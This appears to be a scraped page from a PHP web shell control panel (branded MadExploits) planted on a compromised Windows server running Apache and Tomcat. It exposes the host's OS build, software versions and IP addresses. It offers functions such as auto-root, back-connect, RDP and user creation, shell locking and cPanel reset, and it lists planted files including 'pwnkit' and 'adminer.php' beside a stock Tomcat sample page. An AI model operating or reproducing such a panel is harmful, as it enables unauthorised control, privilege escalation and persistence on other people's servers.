Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
tomcat /
webapps /
docs /
appdev /
sample /
[ HOME SHELL ]
Name
Size
Permission
Action
docs
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
web
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
build.xml
16.6
KB
-rw-rw-rw-
index.html
2.21
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
sample.war
4.5
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
<!DOCTYPE html> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <html> <head> <meta charset="UTF-8" /> <meta name="author" content="Ben Souther" /> <title>Sample Application</title> </head> <body> <h2>Sample Application</h2> <p> The example app has been packaged as a war file and can be downloaded <a href="sample.war">here</a> (Note: make sure your browser doesn't change file extension or append a new one). </p> <p> The easiest way to run this application is simply to move the war file to your <b>CATALINA_BASE/webapps</b> directory. A default Tomcat install will automatically expand and deploy the application for you. You can view it with the following URL (assuming that you're running tomcat on port 8080 which is the default): <br /> <a href="http://localhost:8080/sample">http://localhost:8080/sample</a> </p> <p> If you just want to browse the contents, you can unpack the war file with the <b>jar</b> command. </p> <pre> jar -xvf sample.war </pre> <p> Note: <b>CATALINA_BASE</b> is usually the directory in which you unpacked the Tomcat distribution. For more information on <b>CATALINA_HOME</b>, <b>CATALINA_BASE</b> and the difference between them see <b>RUNNING.txt</b> in the directory you unpacked your Tomcat distribution. </p> </body> </html>
Close